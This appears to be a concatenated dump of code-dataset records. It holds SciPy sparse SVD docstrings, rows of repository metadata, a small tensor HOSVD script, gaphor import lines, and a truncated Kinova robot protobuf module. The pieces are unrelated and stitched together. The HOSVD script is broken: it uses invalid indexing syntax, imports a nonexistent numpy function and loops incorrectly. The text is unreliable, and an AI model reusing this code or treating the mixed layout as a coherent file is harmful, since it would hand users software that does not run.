If `random_state` is already a ``Generator`` or ``RandomState``
instance then that instance is used.
options : dict, optional
A dictionary of solver-specific options. No solver-specific options
are currently supported; this parameter is reserved for future use.
Returns
-------
u : ndarray, shape=(M, k)
Unitary matrix having left singular vectors as columns.
s : ndarray, shape=(k,)
The singular values.
vh : ndarray, shape=(k, N)
Unitary matrix having right singular vectors as rows.
Notes
-----
This is a naive implementation using ARPACK as an eigensolver
on ``A.conj().T @ A`` or ``A @ A.conj().T``, depending on which one is more
efficient.
Examples
--------
Construct a matrix ``A`` from singular values and vectors.
>>> from scipy.stats import ortho_group
>>> from scipy.sparse import csc_matrix, diags
>>> from scipy.sparse.linalg import svds
>>> rng = np.random.default_rng()
>>> orthogonal = csc_matrix(ortho_group.rvs(10, random_state=rng))
>>> s = [0.0001, 0.001, 3, 4, 5] # singular values
>>> u = orthogonal[:, :5] # left singular vectors
>>> vT = orthogonal[:, 5:].T # right singular vectors
>>> A = u @ diags(s) @ vT
With only three singular values/vectors, the SVD approximates the original
matrix.
>>> u2, s2, vT2 = svds(A, k=3, solver='arpack')
>>> A2 = u2 @ np.diag(s2) @ vT2
>>> np.allclose(A2, A.todense(), atol=1e-3)
True
With all five singular values/vectors, we can reproduce the original
matrix.
>>> u3, s3, vT3 = svds(A, k=5, solver='arpack')
>>> A3 = u3 @ np.diag(s3) @ vT3
>>> np.allclose(A3, A.todense())
True
The singular values match the expected singular values, and the singular
vectors are as expected up to a difference in sign.
>>> (np.allclose(s3, s) and
... np.allclose(np.abs(u3), np.abs(u.todense())) and
... np.allclose(np.abs(vT3), np.abs(vT.todense())))
True
The singular vectors are also orthogonal.
>>> (np.allclose(u3.T @ u3, np.eye(5)) and
... np.allclose(vT3 @ vT3.T, np.eye(5)))
True
"""
pass
def _svds_lobpcg_doc(A, k=6, ncv=None, tol=0, which='LM', v0=None,
maxiter=None, return_singular_vectors=True,
solver='lobpcg', random_state=None):
"""
Partial singular value decomposition of a sparse matrix using LOBPCG.
Compute the largest or smallest `k` singular values and corresponding
singular vectors of a sparse matrix `A`. The order in which the singular
values are returned is not guaranteed.
In the descriptions below, let ``M, N = A.shape``.
Parameters
----------
A : sparse matrix or LinearOperator
Matrix to decompose.
k : int, default: 6
Number of singular values and singular vectors to compute.
Must satisfy ``1 <= k <= min(M, N) - 1``.
ncv : int, optional
Ignored.
tol : float, optional
Tolerance for singular values. Zero (default) means machine precision.
which : {'LM', 'SM'}
Which `k` singular values to find: either the largest magnitude ('LM')
or smallest magnitude ('SM') singular values.
v0 : ndarray, optional
If `k` is 1, the starting vector for iteration:
an (approximate) left singular vector if ``N > M`` and a right singular
vector otherwise. Must be of length ``min(M, N)``.
Ignored otherwise.
Default: random
maxiter : int, default: 20
Maximum number of iterations.
return_singular_vectors : {True, False, "u", "vh"}
Singular values are always computed and returned; this parameter
controls the computation and return of singular vectors.
- ``True``: return singular vectors.
- ``False``: do not return singular vectors.
- ``"u"``: if ``M <= N``, compute only the left singular vectors and
return ``None`` for the right singular vectors. Otherwise, compute
all singular vectors.
- ``"vh"``: if ``M > N``, compute only the right singular vectors and
return ``None`` for the left singular vectors. Otherwise, compute
all singular vectors.
solver : {'arpack', 'propack', 'lobpcg'}, optional
This is the solver-specific documentation for ``solver='lobpcg'``.
:ref:`'arpack' <sparse.linalg.svds-arpack>` and
:ref:`'propack' <sparse.linalg.svds-propack>`
are also supported.
random_state : {None, int, `numpy.random.Generator`,
`numpy.random.RandomState`}, optional
Pseudorandom number generator state used to generate resamples.
If `random_state` is ``None`` (or `np.random`), the
`numpy.random.RandomState` singleton is used.
If `random_state` is an int, a new ``RandomState`` instance is used,
seeded with `random_state`.
If `random_state` is already a ``Generator`` or ``RandomState``
instance then that instance is used.
options : dict, optional
A dictionary of solver-specific options. No solver-specific options
are currently supported; this parameter is reserved for future use.
Returns
-------
u : ndarray, shape=(M, k)
Unitary matrix having left singular vectors as columns.
s : ndarray, shape=(k,)
The singular values.
vh : ndarray, shape=(k, N)
Unitary matrix having right singular vectors as rows.
Notes
-----
This is a naive implementation using LOBPCG as an eigensolver
on ``A.conj().T @ A`` or ``A @ A.conj().T``, depending on which one is more
efficient.
Examples
--------
Construct a matrix ``A`` from singular values and vectors.
>>> from scipy.stats import ortho_group
>>> from scipy.sparse import csc_matrix, diags
>>> from scipy.sparse.linalg import svds
>>> rng = np.random.default_rng()
>>> orthogonal = csc_matrix(ortho_group.rvs(10, random_state=rng))
>>> s = [0.0001, 0.001, 3, 4, 5] # singular values
>>> u = orthogonal[:, :5] # left singular vectors
>>> vT = orthogonal[:, 5:].T # right singular vectors
>>> A = u @ diags(s) @ vT
With only three singular values/vectors, the SVD approximates the original
matrix.
>>> u2, s2, vT2 = svds(A, k=3, solver='lobpcg')
>>> A2 = u2 @ np.diag(s2) @ vT2
>>> np.allclose(A2, A.todense(), atol=1e-3)
True
With all five singular values/vectors, we can reproduce the original
matrix.
>>> u3, s3, vT3 = svds(A, k=5, solver='lobpcg')
>>> A3 = u3 @ np.diag(s3) @ vT3
>>> np.allclose(A3, A.todense())
True
The singular values match the expected singular values, and the singular
vectors are as expected up to a difference in sign.
>>> (np.allclose(s3, s) and
... np.allclose(np.abs(u3), np.abs(u.todense())) and
... np.allclose(np.abs(vT3), np.abs(vT.todense())))
True
The singular vectors are also orthogonal.
>>> (np.allclose(u3.T @ u3, np.eye(5)) and
... np.allclose(vT3 @ vT3.T, np.eye(5)))
True
"""
pass
def _svds_propack_doc(A, k=6, ncv=None, tol=0, which='LM', v0=None,
maxiter=None, return_singular_vectors=True,
solver='propack', random_state=None):
"""
Partial singular value decomposition of a sparse matrix using PROPACK.
Compute the largest or smallest `k` singular values and corresponding
singular vectors of a sparse matrix `A`. The order in which the singular
values are returned is not guaranteed.
In the descriptions below, let ``M, N = A.shape``.
Parameters
----------
A : sparse matrix or LinearOperator
Matrix to decompose. If `A` is a ``LinearOperator``
object, it must define both ``matvec`` and ``rmatvec`` methods.
k : int, default: 6
Number of singular values and singular vectors to compute.
Must satisfy ``1 <= k <= min(M, N)``.
ncv : int, optional
Ignored.
tol : float, optional
The desired relative accuracy for computed singular values.
Zero (default) means machine precision.
which : {'LM', 'SM'}
Which `k` singular values to find: either the largest magnitude ('LM')
or smallest magnitude ('SM') singular values. Note that choosing
``which='SM'`` will force the ``irl`` option to be set ``True``.
v0 : ndarray, optional
Starting vector for iterations: must be of length ``A.shape[0]``.
If not specified, PROPACK will generate a starting vector.
maxiter : int, optional
Maximum number of iterations / maximal dimension of the Krylov
subspace. Default is ``10 * k``.
return_singular_vectors : {True, False, "u", "vh"}
Singular values are always computed and returned; this parameter
controls the computation and return of singular vectors.
- ``True``: return singular vectors.
- ``False``: do not return singular vectors.
- ``"u"``: compute only the left singular vectors; return ``None`` for
the right singular vectors.
- ``"vh"``: compute only the right singular vectors; return ``None``
for the left singular vectors.
solver : {'arpack', 'propack', 'lobpcg'}, optional
This is the solver-specific documentation for ``solver='propack'``.
:ref:`'arpack' <sparse.linalg.svds-arpack>` and
:ref:`'lobpcg' <sparse.linalg.svds-lobpcg>`
are also supported.
random_state : {None, int, `numpy.random.Generator`,
`numpy.random.RandomState`}, optional
Pseudorandom number generator state used to generate resamples.
If `random_state` is ``None`` (or `np.random`), the
`numpy.random.RandomState` singleton is used.
If `random_state` is an int, a new ``RandomState`` instance is used,
seeded with `random_state`.
If `random_state` is already a ``Generator`` or ``RandomState``
instance then that instance is used.
options : dict, optional
A dictionary of solver-specific options. No solver-specific options
are currently supported; this parameter is reserved for future use.
Returns
-------
u : ndarray, shape=(M, k)
Unitary matrix having left singular vectors as columns.
s : ndarray, shape=(k,)
The singular values.
vh : ndarray, shape=(k, N)
Unitary matrix having right singular vectors as rows.
Notes
-----
This is an interface to the Fortran library PROPACK [1]_.
The current default is to run with IRL mode disabled unless seeking the
smallest singular values/vectors (``which='SM'``).
References
----------
.. [1] Larsen, Rasmus Munk. "PROPACK-Software for large and sparse SVD
calculations." Available online. URL
http://sun. stanford. edu/rmunk/PROPACK (2004): 2008-2009.
Examples
--------
Construct a matrix ``A`` from singular values and vectors.
>>> from scipy.stats import ortho_group
>>> from scipy.sparse import csc_matrix, diags
>>> from scipy.sparse.linalg import svds
>>> rng = np.random.default_rng()
>>> orthogonal = csc_matrix(ortho_group.rvs(10, random_state=rng))
>>> s = [0.0001, 0.001, 3, 4, 5] # singular values
>>> u = orthogonal[:, :5] # left singular vectors
>>> vT = orthogonal[:, 5:].T # right singular vectors
>>> A = u @ diags(s) @ vT
With only three singular values/vectors, the SVD approximates the original
matrix.
>>> u2, s2, vT2 = svds(A, k=3, solver='propack')
>>> A2 = u2 @ np.diag(s2) @ vT2
>>> np.allclose(A2, A.todense(), atol=1e-3)
True
With all five singular values/vectors, we can reproduce the original
matrix.
>>> u3, s3, vT3 = svds(A, k=5, solver='propack')
>>> A3 = u3 @ np.diag(s3) @ vT3
>>> np.allclose(A3, A.todense())
True
The singular values match the expected singular values, and the singular
vectors are as expected up to a difference in sign.
>>> (np.allclose(s3, s) and
... np.allclose(np.abs(u3), np.abs(u.todense())) and
... np.allclose(np.abs(vT3), np.abs(vT.todense())))
True
The singular vectors are also orthogonal.
>>> (np.allclose(u3.T @ u3, np.eye(5)) and
... np.allclose(vT3 @ vT3.T, np.eye(5)))
True
"""
pass
| 39.296203
| 79
| 0.620023
| 2,040
| 15,522
| 4.689216
| 0.126471
| 0.086243
| 0.026343
| 0.014112
| 0.894522
| 0.894522
| 0.874451
| 0.862534
| 0.855425
| 0.855425
| 0
| 0.015941
| 0.260405
| 15,522
| 394
| 80
| 39.395939
| 0.817334
| 0.876884
| 0
| 0.5
| 0
| 0
| 0.040323
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0.25
| 0
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
b657bd62d644cb56e0af5f8325edb1dd479f9141
| 1,013
|
py
|
Python
|
HOSVD.py
|
mertall/Facial-Recognition
|
c80ca3b69500e701ca95d5c3f34335105d3c55cb
|
[
"BSD-3-Clause"
] | null | null | null |
HOSVD.py
|
mertall/Facial-Recognition
|
c80ca3b69500e701ca95d5c3f34335105d3c55cb
|
[
"BSD-3-Clause"
] | 1
|
2021-05-27T19:27:40.000Z
|
2021-11-16T14:41:00.000Z
|
HOSVD.py
|
mertall/Facial-Recognition
|
c80ca3b69500e701ca95d5c3f34335105d3c55cb
|
[
"BSD-3-Clause"
] | 8
|
2020-11-03T15:50:21.000Z
|
2022-02-10T02:59:22.000Z
|
#Cornell Summer School Charles F. Van Loan
import numpy
from numpy import svd, svds
def dense(A):
#A is n(1) x ... x n(d) tensor
#U is d cell array with U(k) being the left singular vector of a's mode-k unfolding
#S is n(1) x ... x n(d) tensor : A x1 U(1) x2 U(2) ... xd U(d)
S = A
for k,_ in range(A.size()):
C = A[k,:].numpy() ##may need to make sure columns are arranged in increasing order
[U,_,_] = svd(C)
t_U = numpy.transpose(U)
S(k,:).append(numpy.tensordot(S,t_U,k))
return S, t_U
def sparse(A):
#A is n(1) x ... x n(d) tensor
#U is d cell array with U(k) being the left singular vector of a's mode-k unfolding
#S is n(1) x ... x n(d) tensor : A x1 U(1) x2 U(2) ... xd U(d)
S = A
for k,_ in range(A.size()):
C = A[k,:].numpy() ##may need to make sure columns are arranged in increasing order
[U,_,_] = svds(C)
t_U = numpy.transpose(U)
S(k,:).append(numpy.tensordot(S,t_U,k))
return S, t_U
| 34.931034
| 91
| 0.573544
| 202
| 1,013
| 2.816832
| 0.29703
| 0.02109
| 0.02812
| 0.035149
| 0.84007
| 0.84007
| 0.84007
| 0.84007
| 0.84007
| 0.84007
| 0
| 0.016304
| 0.273445
| 1,013
| 29
| 92
| 34.931034
| 0.756793
| 0.502468
| 0
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.111111
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b666eb8724588ad4e1146a0748748f3ade6dc66d
| 190
|
py
|
Python
|
gaphor/C4Model/diagramitems/__init__.py
|
MartinIIOT/gaphor
|
b08bf6ddb8c92ec87fccabc2ddee697609f73e67
|
[
"Apache-2.0"
] | 867
|
2018-01-09T00:19:09.000Z
|
2022-03-31T02:49:23.000Z
|
gaphor/C4Model/diagramitems/__init__.py
|
burakozturk16/gaphor
|
86267a5200ac4439626d35d306dbb376c3800107
|
[
"Apache-2.0"
] | 790
|
2018-01-13T23:47:07.000Z
|
2022-03-31T16:04:27.000Z
|
gaphor/C4Model/diagramitems/__init__.py
|
burakozturk16/gaphor
|
86267a5200ac4439626d35d306dbb376c3800107
|
[
"Apache-2.0"
] | 117
|
2018-01-09T02:24:49.000Z
|
2022-03-23T08:07:42.000Z
|
from gaphor.C4Model.diagramitems.container import C4ContainerItem
from gaphor.C4Model.diagramitems.database import C4DatabaseItem
from gaphor.C4Model.diagramitems.person import C4PersonItem
| 47.5
| 65
| 0.889474
| 21
| 190
| 8.047619
| 0.52381
| 0.177515
| 0.301775
| 0.514793
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.033708
| 0.063158
| 190
| 3
| 66
| 63.333333
| 0.91573
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
b69970f5b0439e19de6da61a5972e097828245db
| 51,781
|
py
|
Python
|
kortex_api/autogen/messages/BaseCyclic_pb2.py
|
vislab-tecnico-lisboa/ros_kortex
|
870a625021631b1d3422c3818aa7a8ce0723d99d
|
[
"BSD-3-Clause"
] | 1
|
2020-12-22T17:37:40.000Z
|
2020-12-22T17:37:40.000Z
|
kortex_api/autogen/messages/BaseCyclic_pb2.py
|
vislab-tecnico-lisboa/ros_kortex
|
870a625021631b1d3422c3818aa7a8ce0723d99d
|
[
"BSD-3-Clause"
] | null | null | null |
kortex_api/autogen/messages/BaseCyclic_pb2.py
|
vislab-tecnico-lisboa/ros_kortex
|
870a625021631b1d3422c3818aa7a8ce0723d99d
|
[
"BSD-3-Clause"
] | null | null | null |
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: BaseCyclic.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf.internal import enum_type_wrapper
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from . import Common_pb2 as Common__pb2
from . import InterconnectCyclicMessage_pb2 as InterconnectCyclicMessage__pb2
try:
Common__pb2 = InterconnectCyclicMessage__pb2.Common__pb2
except AttributeError:
Common__pb2 = InterconnectCyclicMessage__pb2.Common_pb2
try:
GripperCyclicMessage__pb2 = InterconnectCyclicMessage__pb2.GripperCyclicMessage__pb2
except AttributeError:
GripperCyclicMessage__pb2 = InterconnectCyclicMessage__pb2.GripperCyclicMessage_pb2
try:
Common__pb2 = InterconnectCyclicMessage__pb2.Common__pb2
except AttributeError:
Common__pb2 = InterconnectCyclicMessage__pb2.Common_pb2
from .Common_pb2 import *
from .InterconnectCyclicMessage_pb2 import *
DESCRIPTOR = _descriptor.FileDescriptor(
name='BaseCyclic.proto',
package='Kinova.Api.BaseCyclic',
syntax='proto3',
serialized_pb=_b('\n\x10\x42\x61seCyclic.proto\x12\x15Kinova.Api.BaseCyclic\x1a\x0c\x43ommon.proto\x1a\x1fInterconnectCyclicMessage.proto\"\x85\x01\n\x0f\x41\x63tuatorCommand\x12\x12\n\ncommand_id\x18\x01 \x01(\x07\x12\r\n\x05\x66lags\x18\x02 \x01(\x07\x12\x10\n\x08position\x18\x03 \x01(\x02\x12\x10\n\x08velocity\x18\x04 \x01(\x02\x12\x14\n\x0ctorque_joint\x18\x05 \x01(\x02\x12\x15\n\rcurrent_motor\x18\x06 \x01(\x02\"\xbe\x02\n\x10\x41\x63tuatorFeedback\x12\x12\n\ncommand_id\x18\x01 \x01(\x07\x12\x14\n\x0cstatus_flags\x18\x02 \x01(\x07\x12\x13\n\x0bjitter_comm\x18\x03 \x01(\x07\x12\x10\n\x08position\x18\x04 \x01(\x02\x12\x10\n\x08velocity\x18\x05 \x01(\x02\x12\x0e\n\x06torque\x18\x06 \x01(\x02\x12\x15\n\rcurrent_motor\x18\x07 \x01(\x02\x12\x0f\n\x07voltage\x18\x08 \x01(\x02\x12\x19\n\x11temperature_motor\x18\t \x01(\x02\x12\x18\n\x10temperature_core\x18\n \x01(\x02\x12\x14\n\x0c\x66\x61ult_bank_a\x18\x0b \x01(\x07\x12\x14\n\x0c\x66\x61ult_bank_b\x18\x0c \x01(\x07\x12\x16\n\x0ewarning_bank_a\x18\r \x01(\x07\x12\x16\n\x0ewarning_bank_b\x18\x0e \x01(\x07\"\x9e\x03\n\x12\x41\x63tuatorCustomData\x12\x12\n\ncommand_id\x18\x01 \x01(\x07\x12\x15\n\rcustom_data_0\x18\x02 \x01(\x07\x12\x15\n\rcustom_data_1\x18\x03 \x01(\x07\x12\x15\n\rcustom_data_2\x18\x04 \x01(\x07\x12\x15\n\rcustom_data_3\x18\x05 \x01(\x07\x12\x15\n\rcustom_data_4\x18\x06 \x01(\x07\x12\x15\n\rcustom_data_5\x18\x07 \x01(\x07\x12\x15\n\rcustom_data_6\x18\x08 \x01(\x07\x12\x15\n\rcustom_data_7\x18\t \x01(\x07\x12\x15\n\rcustom_data_8\x18\n \x01(\x07\x12\x15\n\rcustom_data_9\x18\x0b \x01(\x07\x12\x16\n\x0e\x63ustom_data_10\x18\x0c \x01(\x07\x12\x16\n\x0e\x63ustom_data_11\x18\r \x01(\x07\x12\x16\n\x0e\x63ustom_data_12\x18\x0e \x01(\x07\x12\x16\n\x0e\x63ustom_data_13\x18\x0f \x01(\x07\x12\x16\n\x0e\x63ustom_data_14\x18\x10 \x01(\x07\x12\x16\n\x0e\x63ustom_data_15\x18\x11 \x01(\x07\"\xd1\t\n\x0c\x42\x61seFeedback\x12*\n\"active_state_connection_identifier\x18\x01 \x01(\r\x12\x31\n\x0c\x61\x63tive_state\x18\x02 \x01(\x0e\x32\x1b.Kinova.Api.Common.ArmState\x12\x13\n\x0b\x61rm_voltage\x18\x03 \x01(\x02\x12\x13\n\x0b\x61rm_current\x18\x04 \x01(\x02\x12\x17\n\x0ftemperature_cpu\x18\x05 \x01(\x02\x12\x1b\n\x13temperature_ambient\x18\x06 \x01(\x02\x12\x1a\n\x12imu_acceleration_x\x18\x07 \x01(\x02\x12\x1a\n\x12imu_acceleration_y\x18\x08 \x01(\x02\x12\x1a\n\x12imu_acceleration_z\x18\t \x01(\x02\x12\x1e\n\x16imu_angular_velocity_x\x18\n \x01(\x02\x12\x1e\n\x16imu_angular_velocity_y\x18\x0b \x01(\x02\x12\x1e\n\x16imu_angular_velocity_z\x18\x0c \x01(\x02\x12\x13\n\x0btool_pose_x\x18\r \x01(\x02\x12\x13\n\x0btool_pose_y\x18\x0e \x01(\x02\x12\x13\n\x0btool_pose_z\x18\x0f \x01(\x02\x12\x19\n\x11tool_pose_theta_x\x18\x10 \x01(\x02\x12\x19\n\x11tool_pose_theta_y\x18\x11 \x01(\x02\x12\x19\n\x11tool_pose_theta_z\x18\x12 \x01(\x02\x12\x1b\n\x13tool_twist_linear_x\x18\x13 \x01(\x02\x12\x1b\n\x13tool_twist_linear_y\x18\x14 \x01(\x02\x12\x1b\n\x13tool_twist_linear_z\x18\x15 \x01(\x02\x12\x1c\n\x14tool_twist_angular_x\x18\x16 \x01(\x02\x12\x1c\n\x14tool_twist_angular_y\x18\x17 \x01(\x02\x12\x1c\n\x14tool_twist_angular_z\x18\x18 \x01(\x02\x12$\n\x1ctool_external_wrench_force_x\x18\x19 \x01(\x02\x12$\n\x1ctool_external_wrench_force_y\x18\x1a \x01(\x02\x12$\n\x1ctool_external_wrench_force_z\x18\x1b \x01(\x02\x12%\n\x1dtool_external_wrench_torque_x\x18\x1c \x01(\x02\x12%\n\x1dtool_external_wrench_torque_y\x18\x1d \x01(\x02\x12%\n\x1dtool_external_wrench_torque_z\x18\x1e \x01(\x02\x12\x14\n\x0c\x66\x61ult_bank_a\x18\x1f \x01(\x07\x12\x14\n\x0c\x66\x61ult_bank_b\x18 \x01(\x07\x12\x16\n\x0ewarning_bank_a\x18! \x01(\x07\x12\x16\n\x0ewarning_bank_b\x18\" \x01(\x07\x12\x1d\n\x15\x63ommanded_tool_pose_x\x18# \x01(\x02\x12\x1d\n\x15\x63ommanded_tool_pose_y\x18$ \x01(\x02\x12\x1d\n\x15\x63ommanded_tool_pose_z\x18% \x01(\x02\x12#\n\x1b\x63ommanded_tool_pose_theta_x\x18& \x01(\x02\x12#\n\x1b\x63ommanded_tool_pose_theta_y\x18\' \x01(\x02\x12#\n\x1b\x63ommanded_tool_pose_theta_z\x18( \x01(\x02\"\xed\x02\n\nCustomData\x12\x10\n\x08\x66rame_id\x18\x01 \x01(\x07\x12\x15\n\rcustom_data_0\x18\x02 \x01(\x07\x12\x15\n\rcustom_data_1\x18\x03 \x01(\x07\x12\x15\n\rcustom_data_2\x18\x04 \x01(\x07\x12\x15\n\rcustom_data_3\x18\x05 \x01(\x07\x12\x15\n\rcustom_data_4\x18\x06 \x01(\x07\x12\x15\n\rcustom_data_5\x18\x07 \x01(\x07\x12\x15\n\rcustom_data_6\x18\x08 \x01(\x07\x12\x15\n\rcustom_data_7\x18\t \x01(\x07\x12H\n\x15\x61\x63tuators_custom_data\x18\n \x03(\x0b\x32).Kinova.Api.BaseCyclic.ActuatorCustomData\x12K\n\x18interconnect_custom_data\x18\x0b \x01(\x0b\x32).Kinova.Api.InterconnectCyclic.CustomData\"\x94\x01\n\x07\x43ommand\x12\x10\n\x08\x66rame_id\x18\x01 \x01(\x07\x12\x39\n\tactuators\x18\x02 \x03(\x0b\x32&.Kinova.Api.BaseCyclic.ActuatorCommand\x12<\n\x0cinterconnect\x18\x03 \x01(\x0b\x32&.Kinova.Api.InterconnectCyclic.Command\"\xca\x01\n\x08\x46\x65\x65\x64\x62\x61\x63k\x12\x10\n\x08\x66rame_id\x18\x01 \x01(\x07\x12\x31\n\x04\x62\x61se\x18\x02 \x01(\x0b\x32#.Kinova.Api.BaseCyclic.BaseFeedback\x12:\n\tactuators\x18\x03 \x03(\x0b\x32\'.Kinova.Api.BaseCyclic.ActuatorFeedback\x12=\n\x0cinterconnect\x18\x04 \x01(\x0b\x32\'.Kinova.Api.InterconnectCyclic.Feedback*5\n\x0eServiceVersion\x12\x0e\n\nRESERVED_0\x10\x00\x12\x13\n\x0f\x43URRENT_VERSION\x10\x01\x32\xcd\x02\n\nBaseCyclic\x12J\n\x07Refresh\x12\x1e.Kinova.Api.BaseCyclic.Command\x1a\x1f.Kinova.Api.BaseCyclic.Feedback\x12J\n\x0eRefreshCommand\x12\x1e.Kinova.Api.BaseCyclic.Command\x1a\x18.Kinova.Api.Common.Empty\x12L\n\x0fRefreshFeedback\x12\x18.Kinova.Api.Common.Empty\x1a\x1f.Kinova.Api.BaseCyclic.Feedback\x12Y\n\x11RefreshCustomData\x12!.Kinova.Api.BaseCyclic.CustomData\x1a!.Kinova.Api.BaseCyclic.CustomDataP\x00P\x01\x62\x06proto3')
,
dependencies=[Common__pb2.DESCRIPTOR,InterconnectCyclicMessage__pb2.DESCRIPTOR,],
public_dependencies=[Common__pb2.DESCRIPTOR,InterconnectCyclicMessage__pb2.DESCRIPTOR,])
_SERVICEVERSION = _descriptor.EnumDescriptor(
name='ServiceVersion',
full_name='Kinova.Api.BaseCyclic.ServiceVersion',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='RESERVED_0', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CURRENT_VERSION', index=1, number=1,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=2924,
serialized_end=2977,
)
_sym_db.RegisterEnumDescriptor(_SERVICEVERSION)
ServiceVersion = enum_type_wrapper.EnumTypeWrapper(_SERVICEVERSION)
RESERVED_0 = 0
CURRENT_VERSION = 1
_ACTUATORCOMMAND = _descriptor.Descriptor(
name='ActuatorCommand',
full_name='Kinova.Api.BaseCyclic.ActuatorCommand',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='command_id', full_name='Kinova.Api.BaseCyclic.ActuatorCommand.command_id', index=0,
number=1, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='flags', full_name='Kinova.Api.BaseCyclic.ActuatorCommand.flags', index=1,
number=2, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='position', full_name='Kinova.Api.BaseCyclic.ActuatorCommand.position', index=2,
number=3, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='velocity', full_name='Kinova.Api.BaseCyclic.ActuatorCommand.velocity', index=3,
number=4, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='torque_joint', full_name='Kinova.Api.BaseCyclic.ActuatorCommand.torque_joint', index=4,
number=5, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='current_motor', full_name='Kinova.Api.BaseCyclic.ActuatorCommand.current_motor', index=5,
number=6, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=91,
serialized_end=224,
)
_ACTUATORFEEDBACK = _descriptor.Descriptor(
name='ActuatorFeedback',
full_name='Kinova.Api.BaseCyclic.ActuatorFeedback',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='command_id', full_name='Kinova.Api.BaseCyclic.ActuatorFeedback.command_id', index=0,
number=1, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='status_flags', full_name='Kinova.Api.BaseCyclic.ActuatorFeedback.status_flags', index=1,
number=2, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='jitter_comm', full_name='Kinova.Api.BaseCyclic.ActuatorFeedback.jitter_comm', index=2,
number=3, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='position', full_name='Kinova.Api.BaseCyclic.ActuatorFeedback.position', index=3,
number=4, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='velocity', full_name='Kinova.Api.BaseCyclic.ActuatorFeedback.velocity', index=4,
number=5, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='torque', full_name='Kinova.Api.BaseCyclic.ActuatorFeedback.torque', index=5,
number=6, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='current_motor', full_name='Kinova.Api.BaseCyclic.ActuatorFeedback.current_motor', index=6,
number=7, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='voltage', full_name='Kinova.Api.BaseCyclic.ActuatorFeedback.voltage', index=7,
